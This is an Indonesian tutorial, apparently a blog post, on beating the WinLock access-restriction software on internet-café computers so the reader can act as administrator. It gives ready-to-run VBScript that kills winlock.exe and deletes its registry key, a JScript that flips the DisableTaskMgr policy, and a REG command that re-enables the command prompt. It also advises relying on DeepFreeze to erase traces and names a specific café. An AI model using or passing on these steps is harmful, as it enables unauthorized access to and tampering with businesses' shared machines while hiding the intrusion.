Tutorial Iseng Di Warnet Versi Winlock

Okey, Pasti semua udah tau winlock itu apa kan ?

Kalo blom tau search aja di google yah..

Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.

Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.

Contohnya aja Net E*ph*ria / L*ghT*o Net di Jalan Kampus Anggrek-Syahdan.

Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.

Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.

Sebenernya sudah saya tulis di website pribadi / blog saya, Cuma gak ada salahnya kan buat sharing disini ? heheheh..

OK. Yang dibutuhin cuma 1. Notepad / Wordpad.

ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak.

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next


Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Best regards.

suicidal

Novrizal Zuhri